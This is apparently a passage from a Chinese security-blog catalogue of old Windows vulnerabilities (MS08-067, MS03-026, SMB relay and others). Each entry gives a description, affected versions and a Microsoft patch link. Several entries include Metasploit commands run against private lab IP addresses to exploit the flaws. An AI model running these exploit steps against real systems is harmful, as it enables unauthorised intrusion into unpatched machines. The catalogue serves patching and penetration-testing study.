| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows Server 2008 | - | |||
| Windows Server 2008 | - | SP2 | ||
| Windows Server 2008 | - | SP2 | Itanium | |
| Windows Server 2008 | - | SP2 | X64 | |
| Windows Server 2008 | - | SP2 | X86 | |
| Windows Server 2008 | Itanium | |||
| Windows Server 2008 | X32 | |||
| Windows Server 2008 | X64 | |||
| Windows Vista | - | SP1 | ||
| Windows Vista | - | SP2 | ||
| Windows Vista | X64 | |||
| Windows Vista | SP1 | X64 | ||
| Windows Vista | SP2 | X64 | ||
| Windows Vista |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2009-2532
利用方式
利用msf 测试系统windows server 2008 sp2 x86
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS 192.168.1.13 #目标IP
run
CVE-2009-0079
描述
RPCSS服务不能在一组不同的进程之间正确实现隔离,这些进程全部在NetworkService帐户下运行,或者所有在LocalService帐户下运行,这允许 本地用户通过访问其中一个进程的资源来获得特权。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows Server 2003 | SP1 | |||
| Windows Server 2003 | SP1 | Itanium | ||
| Windows Server 2003 | SP2 | |||
| Windows Server 2003 | SP2 | Itanium | ||
| Windows Server 2003 | SP2 | X64 | ||
| Windows Server 2003 | X64 | |||
| Windows Xp | Pro X64 | |||
| Windows Xp | SP2 | |||
| Windows Xp | SP2 | Pro X64 | ||
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2009-0079
利用方式
暂无
CVE-2008-4037
描述
通过远程SMB服务器可以重播客户端用户的NTLM凭据在客户端计算机上执行任意代码
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows XP | SP2 | |||
| Windows XP | SP2 | X64 | ||
| Windows XP | SP3 | |||
| Windows XP | Unknown | X64 | ||
| Windows Server 2003 | SP1 | Itanium | ||
| Windows Server 2003 | SP2 | |||
| Windows Server 2003 | SP2 | Itanium | ||
| Windows Server 2003 | SP2 | X64 | ||
| Windows Server 2003 | Unknown | X64 | ||
| Windows Server 2003 | SP1 | |||
| Windows 2000 | - | SP4 | ||
| Windows Server 2008 | - | X32 | ||
| Windows Server 2008 | - | X64 | ||
| Windows Server 2008 | - | Itanium | ||
| Windows Vista | - | SP1 | X64 | |
| Windows Vista | - | |||
| Windows Vista | - | X64 | ||
| Windows Vista | - | SP1 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-4037
利用方式
使用msf 测试系统windows server 2003 sp2 x86
use exploit/windows/smb/smb_relay
set SMBHOST 192.168.1.14 #目标IP
run
CVE-2008-4250
描述
Pre-Beta中的Server服务允许远程攻击者通过精心设计的RPC请求执行任意代码,该请求会在执行以下操作时触发溢出路径规范化。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2000 | SP4 | |||
| Windows Server 2003 | SP1 | |||
| Windows Server 2003 | SP1 | Itanium | ||
| Windows Server 2003 | SP2 | |||
| Windows Server 2003 | SP2 | Itanium | ||
| Windows Server 2003 | SP2 | X64 | ||
| Windows Server 2003 | X64 | |||
| Windows Server 2008 | X32 | |||
| Windows Server 2008 | X64 | |||
| Windows Server 2008 | Itanium | |||
| Windows Vista | SP1 | X64 | ||
| Windows Vista | ||||
| Windows Vista | X64 | |||
| Windows Vista | SP1 | |||
| Windows Xp | Professional X64 | |||
| Windows Xp | SP2 | |||
| Windows Xp | SP2 | Professional X64 | ||
| Windows Xp | SP3 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-4250
利用方式
使用msf 测试系统windows server 2003 sp2 x86
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.14
run
CVE-2008-3464
描述
辅助功能驱动程序(AFD)组件中的afd.sys无法正确验证从用户模式发送到内核的输入,这允许本地用户通过精心设计的应用程序获取特权 ,如使用精心设计的指针和长度所说明的那样,这些指针和长度绕过了预期的ProbeForRead和ProbeForWrite限制。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2003 Server | SP2 | |||
| Windows 2003 Server | SP2 | Itanium | ||
| Windows 2003 Server | SP2 | X64 | ||
| Windows 2003 Server | X64 | |||
| Windows 2003 Server | SP1 | Itanium | ||
| Windows 2003 Server | Professional | SP3 | ||
| Windows Xp | SP2 | Professional X64 | ||
| Windows Xp | SP3 | |||
| Windows Xp | Professional X64 | |||
| Windows Xp | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-3464
利用方式
只找到可执行exe文件,测试系统windows server 2003 sp2 x86
CVE-2008-1084
描述
内核中未指定的漏洞允许本地用户通过与错误输入验证有关的未知向量执行任意代码。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2000 | SP4 | |||
| Windows 2003 Server | SP2 | X64 | ||
| Windows 2003 Server | X64 | |||
| Windows 2003 Server | SP1 | |||
| Windows 2003 Server | SP1 | Itanium | ||
| Windows 2003 Server | SP2 | |||
| Windows 2003 Server | SP2 | Itanium | ||
| Windows Server 2008 | - | |||
| Windows Vista | X64 | |||
| Windows Vista | SP1 | |||
| Windows Vista | SP1 | X64 | ||
| Windows Xp | SP2 | |||
| Windows Xp | SP2 | X64 | ||
| Windows Xp | X64 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-1084
利用方式
测试系统windows server 2003 sp2 x86
CVE-2006-3439
描述
服务器服务中的缓冲区溢出允许包括匿名用户在内的远程攻击者通过精心制作的RPC消息执行任意代码
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2000 | SP4 | |||
| Windows 2003 Server | R2 | |||
| Windows 2003 Server | SP1 | |||
| Windows 2003 Server | SP1 | Itanium | ||
| Windows 2003 Server | 64-bit | |||
| Windows 2003 Server | Itanium | |||
| Windows Xp | SP1 | Tablet Pc | ||
| Windows Xp | SP2 | Tablet Pc | ||
| Windows Xp | 64-bit |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2006-3439
利用方式
msf 利用 测试系统windows server 2000 sp4 x86
use exploit/windows/smb/ms06_040_netapi
set RHOST 192.168.1.17
run
CVE-2005-1983
描述
PnP服务中基于堆栈的缓冲区溢出使远程攻击者可以通过精心制作的数据包执行任意代码,而本地用户可以通过恶意应用程序获取特权, Zotob(又名Mytob)蠕虫。
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2000 | ||||
| Windows Xp | SP1 | Tablet Pc |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2005-1983
利用方式
暂无
CVE-2003-0352
描述
某些RPC的DCOM接口中的缓冲区溢出使远程攻击者可以通过格式错误的消息执行任意代码
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 2000 | ||||
| Windows 2000 | SP1 | |||
| Windows 2000 | SP2 | |||
| Windows 2000 | SP3 | |||
| Windows 2000 | SP4 | |||
| Windows 2003 Server | R2 | 64-bit | ||
| Windows 2003 Server | R2 | Datacenter 64-bit | ||
| Windows 2003 Server | WEB | |||
| Windows 2003 Server | Enterprise | 64-bit | ||
| Windows 2003 Server | Enterprise 64-bit | |||
| Windows 2003 Server | Standard | 64-bit | ||
| Windows Nt | 4.0 | SP1 | Server | |
| Windows Nt | 4.0 | SP5 | Server | |
| Windows Nt | 4.0 | SP4 | Enterprise Server | |
| Windows Nt | 4.0 | Enterprise Server | ||
| Windows Nt | 4.0 | SP6 | Workstation | |
| Windows Nt | 4.0 | SP2 | Workstation | |
| Windows Nt | 4.0 | SP1 | Terminal Server | |
| Windows Nt | 4.0 | SP5 | Terminal Server | |
| Windows Nt | 4.0 | SP4 | Server | |
| Windows Nt | 4.0 | Server | ||
| Windows Nt | 4.0 | Sp6a | Enterprise Server | |
| Windows Nt | 4.0 | SP3 | Enterprise Server | |
| Windows Nt | 4.0 | SP5 | Workstation | |
| Windows Nt | 4.0 | SP1 | Workstation | |
| Windows Nt | 4.0 | SP4 | Terminal Server | |
| Windows Nt | 4.0 | Terminal Server | ||
| Windows Nt | 4.0 | Sp6a | Server | |
| Windows Nt | 4.0 | SP3 | Server | |
| Windows Nt | 4.0 | SP6 | Enterprise Server | |
| Windows Nt | 4.0 | SP2 | Enterprise Server | |
| Windows Nt | 4.0 | SP4 | Workstation | |
| Windows Nt | 4.0 | Workstation | ||
| Windows Nt | 4.0 | Sp6a | Terminal Server | |
| Windows Nt | 4.0 | SP3 | Terminal Server | |
| Windows Nt | 4.0 | SP6 | Server | |
| Windows Nt | 4.0 | SP2 | Server | |
| Windows Nt | 4.0 | SP1 | Enterprise Server | |
| Windows Nt | 4.0 | SP5 | Enterprise Server | |
| Windows Nt | 4.0 | Sp6a | Workstation | |
| Windows Nt | 4.0 | SP3 | Workstation | |
| Windows Nt | 4.0 | SP6 | Terminal Server | |
| Windows Nt | 4.0 | SP2 | Terminal Server | |
| Windows Xp | 64-bit | |||
| Windows Xp | Home | |||
| Windows Xp | Gold | Professional | ||
| Windows Xp | SP1 | 64-bit | ||
| Windows Xp | SP1 | Home |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2003-0352
利用方式
测试系统windows 2000 sp4 x86
use exploit/windows/dcerpc/ms03_026_dcom
set RHOST 192.168.1.17
run
查看系统信息
本文作者:ascotbe
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/144478.html
如有侵权请联系:admin#unsafe.sh